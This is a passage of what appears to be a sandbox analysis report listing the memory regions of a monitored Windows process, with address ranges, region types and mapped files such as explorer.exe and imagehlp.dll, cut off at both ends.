= 1625 start_va = 0x8500000 end_va = 0x875dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1626 start_va = 0x8760000 end_va = 0x89bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008760000" filename = "" Region: id = 1627 start_va = 0x89c0000 end_va = 0x8c22fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089c0000" filename = "" Region: id = 1628 start_va = 0x8500000 end_va = 0x8764fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1660 start_va = 0x8770000 end_va = 0x89d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008770000" filename = "" Region: id = 1670 start_va = 0x8500000 end_va = 0x8769fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1675 start_va = 0x8770000 end_va = 0x89dcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008770000" filename = "" Region: id = 1679 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1680 start_va = 0x8500000 end_va = 0x876efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1691 start_va = 0x8770000 end_va = 0x89e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008770000" filename = "" Region: id = 1695 start_va = 0x89f0000 end_va = 0x8c63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089f0000" filename = "" Region: id = 1696 start_va = 0x8500000 end_va = 0x8776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1703 start_va = 0x8780000 end_va = 0x89f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 1711 start_va = 0x8500000 end_va = 0x877bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1720 start_va = 0x8780000 end_va = 0x89fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 1721 start_va = 0x8a00000 end_va = 0x8c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a00000" filename = "" Region: id = 1722 start_va = 0x8500000 end_va = 0x8782fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1723 start_va = 0x8790000 end_va = 0x8a15fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008790000" filename = "" Region: id = 1724 start_va = 0x8500000 end_va = 0x8787fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1725 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1726 start_va = 0x8790000 end_va = 0x8a1afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008790000" filename = "" Region: id = 1727 start_va = 0x8500000 end_va = 0x878cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1728 start_va = 0x8790000 end_va = 0x8a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008790000" filename = "" Region: id = 1729 start_va = 0x8a20000 end_va = 0x8cb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a20000" filename = "" Region: id = 1730 start_va = 0x8500000 end_va = 0x8794fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1731 start_va = 0x87a0000 end_va = 0x8a36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087a0000" filename = "" Region: id = 1732 start_va = 0x8500000 end_va = 0x8799fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1733 start_va = 0x87a0000 end_va = 0x8a3bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087a0000" filename = "" Region: id = 1734 start_va = 0x8500000 end_va = 0x879efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1735 start_va = 0x87a0000 end_va = 0x8a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087a0000" filename = "" Region: id = 1736 start_va = 0x8a50000 end_va = 0x8cf3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a50000" filename = "" Region: id = 1737 start_va = 0x8500000 end_va = 0x87a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1738 start_va = 0x87b0000 end_va = 0x8a58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087b0000" filename = "" Region: id = 1739 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1740 start_va = 0x3a20000 end_va = 0x3a31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1741 start_va = 0x3b70000 end_va = 0x3b7dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b70000" filename = "" Region: id = 1742 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1743 start_va = 0x8500000 end_va = 0x87aafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1744 start_va = 0x87b0000 end_va = 0x8a5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087b0000" filename = "" Region: id = 1745 start_va = 0x8500000 end_va = 0x87affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1746 start_va = 0x87b0000 end_va = 0x8a62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087b0000" filename = "" Region: id = 1747 start_va = 0x8a70000 end_va = 0x8d24fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a70000" filename = "" Region: id = 1748 start_va = 0x8500000 end_va = 0x87b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1749 start_va = 0x87c0000 end_va = 0x8a79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 1750 start_va = 0x8500000 end_va = 0x87bcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1751 start_va = 0x87c0000 end_va = 0x8a7efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 1752 start_va = 0x8a80000 end_va = 0x8d41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a80000" filename = "" Region: id = 1753 start_va = 0x8500000 end_va = 0x87c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1754 start_va = 0x87d0000 end_va = 0x8a96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 1755 start_va = 0x8500000 end_va = 0x87c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1756 start_va = 0x87d0000 end_va = 0x8a9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 1757 start_va = 0x8500000 end_va = 0x87cdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1758 start_va = 0x87d0000 end_va = 0x8aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 1759 start_va = 0x8ab0000 end_va = 0x8d82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ab0000" filename = "" Region: id = 1760 start_va = 0x8500000 end_va = 0x87d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1761 start_va = 0x87e0000 end_va = 0x8ab7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 1762 start_va = 0x8500000 end_va = 0x87dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1763 start_va = 0x87e0000 end_va = 0x8abcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 1764 start_va = 0x8500000 end_va = 0x87dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1765 start_va = 0x87e0000 end_va = 0x8ac1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 1766 start_va = 0x8ad0000 end_va = 0x8db4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ad0000" filename = "" Region: id = 1767 start_va = 0x8500000 end_va = 0x87e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1768 start_va = 0x87f0000 end_va = 0x8ad9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 1769 start_va = 0x8500000 end_va = 0x87ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1770 start_va = 0x87f0000 end_va = 0x8adefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 1771 start_va = 0x8ae0000 end_va = 0x8dd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ae0000" filename = "" Region: id = 1772 start_va = 0x8500000 end_va = 0x87f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1773 start_va = 0x8800000 end_va = 0x8af5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 1774 start_va = 0x8500000 end_va = 0x87f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1775 start_va = 0x8b40000 end_va = 0x8bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b40000" filename = "" Region: id = 1776 start_va = 0x7feff160000 end_va = 0x7feff176fff monitored = 0 entry_point = 0x7feff161070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1777 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1778 start_va = 0x8bc0000 end_va = 0x8cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bc0000" filename = "" Region: id = 1779 start_va = 0x8cc0000 end_va = 0x8f7dfff monitored = 0 entry_point = 0x8ceb790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1780 start_va = 0x8800000 end_va = 0x8afafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 1781 start_va = 0x8500000 end_va = 0x87fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1782 start_va = 0x8800000 end_va = 0x8afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 1783 start_va = 0x8cc0000 end_va = 0x8fc2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1784 start_va = 0x8500000 end_va = 0x8804fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1785 start_va = 0x8810000 end_va = 0x8b17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 1786 start_va = 0x8500000 end_va = 0x8809fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1787 start_va = 0x8810000 end_va = 0x8b1cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 1788 start_va = 0x8500000 end_va = 0x880efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1789 start_va = 0x8810000 end_va = 0x8b21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 1790 start_va = 0x8cc0000 end_va = 0x8fd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1791 start_va = 0x8500000 end_va = 0x8816fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1792 start_va = 0x8820000 end_va = 0x8b38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008820000" filename = "" Region: id = 1793 start_va = 0x8500000 end_va = 0x881bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1794 start_va = 0x8820000 end_va = 0x8b3dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008820000" filename = "" Region: id = 1795 start_va = 0x8cc0000 end_va = 0x8fe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1796 start_va = 0x8500000 end_va = 0x8822fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1797 start_va = 0x8cc0000 end_va = 0x8fe5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1798 start_va = 0x8500000 end_va = 0x8827fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1799 start_va = 0x8cc0000 end_va = 0x8feafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1800 start_va = 0x8500000 end_va = 0x882cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1826 start_va = 0x8cc0000 end_va = 0x8feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1827 start_va = 0x8500000 end_va = 0x8831fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1828 start_va = 0x8cc0000 end_va = 0x8ff4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1829 start_va = 0x8500000 end_va = 0x8836fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1830 start_va = 0x8cc0000 end_va = 0x8ff9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1831 start_va = 0x8500000 end_va = 0x883bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1832 start_va = 0x8cc0000 end_va = 0x8ffefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1833 start_va = 0x8500000 end_va = 0x8840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1834 start_va = 0x8cc0000 end_va = 0x9003fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1835 start_va = 0x8500000 end_va = 0x8845fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1836 start_va = 0x8cc0000 end_va = 0x9008fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1837 start_va = 0x8500000 end_va = 0x884afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1838 start_va = 0x8cc0000 end_va = 0x900dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1839 start_va = 0x8500000 end_va = 0x884ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1840 start_va = 0x8cc0000 end_va = 0x9012fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1841 start_va = 0x8500000 end_va = 0x8854fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1842 start_va = 0x8cc0000 end_va = 0x9017fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1843 start_va = 0x8500000 end_va = 0x8859fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1844 start_va = 0x8cc0000 end_va = 0x901cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1845 start_va = 0x8500000 end_va = 0x885efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1846 start_va = 0x8cc0000 end_va = 0x9021fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1847 start_va = 0x8500000 end_va = 0x8863fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1848 start_va = 0x8cc0000 end_va = 0x9026fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1849 start_va = 0x8500000 end_va = 0x8868fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1850 start_va = 0x8cc0000 end_va = 0x902bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1851 start_va = 0x8500000 end_va = 0x886dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1852 start_va = 0x8cc0000 end_va = 0x9030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1853 start_va = 0x8500000 end_va = 0x8872fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1854 start_va = 0x8cc0000 end_va = 0x9035fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1855 start_va = 0x8500000 end_va = 0x8877fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1856 start_va = 0x8cc0000 end_va = 0x9034fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 1904 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1905 start_va = 0x3a20000 end_va = 0x3a31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1906 start_va = 0x3b70000 end_va = 0x3b7dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b70000" filename = "" Region: id = 1907 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1920 start_va = 0x3a20000 end_va = 0x3a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1921 start_va = 0x3970000 end_va = 0x3970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 1930 start_va = 0x3a20000 end_va = 0x3a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 2339 start_va = 0x36b0000 end_va = 0x36bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036b0000" filename = "" Region: id = 2421 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2422 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2423 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2424 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2549 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2550 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2551 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2552 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2559 start_va = 0x2580000 end_va = 0x2584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2562 start_va = 0x2590000 end_va = 0x25a5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2563 start_va = 0x26f0000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 2564 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 2565 start_va = 0x5f30000 end_va = 0x60dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f30000" filename = "" Region: id = 2566 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2567 start_va = 0x25f0000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 2568 start_va = 0x6110000 end_va = 0x618ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006110000" filename = "" Region: id = 2569 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2570 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 2571 start_va = 0x25b0000 end_va = 0x25c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2572 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2573 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2574 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2575 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2576 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2577 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2578 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2579 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2580 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2581 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2582 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2583 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2584 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2585 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2586 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2587 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2588 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2589 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2590 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2591 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2592 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2593 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2594 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2595 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2596 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2597 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2598 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2599 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2600 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2601 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2602 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2603 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2604 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2605 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2606 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2607 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2608 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2609 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2610 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2611 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2612 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2613 